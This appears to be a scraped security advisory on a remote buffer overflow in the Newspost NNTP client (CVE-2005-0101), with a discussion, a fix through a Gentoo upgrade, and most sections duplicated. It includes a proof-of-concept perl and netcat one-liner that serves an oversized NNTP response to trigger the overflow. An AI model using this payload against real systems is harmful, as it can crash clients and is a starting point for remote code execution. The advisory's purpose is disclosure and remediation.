Newspost Remote Buffer Overflow Vulnerability
BID:12418
Info
Newspost Remote Buffer Overflow Vulnerability
| Bugtraq ID: | 12418 |
| Class: | Boundary Condition Error |
| CVE: |
CVE-2005-0101 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 01 2005 12:00AM |
| Updated: | Jul 12 2009 10:06AM |
| Credit: | Discovery of this vulnerability is credited to Niels Heinen. |
| Vulnerable: |
Newspost Newspost 2.1.1 Newspost Newspost 2.0 |
| Not Vulnerable: | |
Discussion
Newspost Remote Buffer Overflow Vulnerability
Newspost is prone to a remote buffer overflow vulnerability due to an unbounded memory copy operation.
The problem occurs in the 'socket_getline()' function of 'socket.c' when the vulnerable client handles NNTP server responses.
Successful exploitation of this issue could potentially lead to arbitrary code execution.
This issue was reported to affect Newspost 2.1.1 and prior, however, other versions may be vulnerable.
Newspost is prone to a remote buffer overflow vulnerability due to an unbounded memory copy operation.
The problem occurs in the 'socket_getline()' function of 'socket.c' when the vulnerable client handles NNTP server responses.
Successful exploitation of this issue could potentially lead to arbitrary code execution.
This issue was reported to affect Newspost 2.1.1 and prior, however, other versions may be vulnerable.
Exploit / POC
Newspost Remote Buffer Overflow Vulnerability
No exploit is available, however a proof of concept to trigger the issue is available:
Create a server:
perl -e 'print "A" x 1024;print "BBBBCCCCDDDDEEEE"'| nc -v -l -p 119
Connect to it:
newspost -s test -i localhost -f [email protected] -n news.news /etc/hosts
The following exploit has been made available:
No exploit is available, however a proof of concept to trigger the issue is available:
Create a server:
perl -e 'print "A" x 1024;print "BBBBCCCCDDDDEEEE"'| nc -v -l -p 119
Connect to it:
newspost -s test -i localhost -f [email protected] -n news.news /etc/hosts
The following exploit has been made available:
Solution / Fix
Newspost Remote Buffer Overflow Vulnerability
Solution:
Gento Linux has released an advisory dealing with this issue. Gentoo advises that all Newspost users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-nttp/newspost-2.0-r1"
For more information, please see the referenced Gentoo advisory.
Solution:
Gento Linux has released an advisory dealing with this issue. Gentoo advises that all Newspost users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-nttp/newspost-2.0-r1"
For more information, please see the referenced Gentoo advisory.
References
Newspost Remote Buffer Overflow Vulnerability
References:
References:
- Bug description (Niels Heinen)
- Newspost Homepage (Newspost)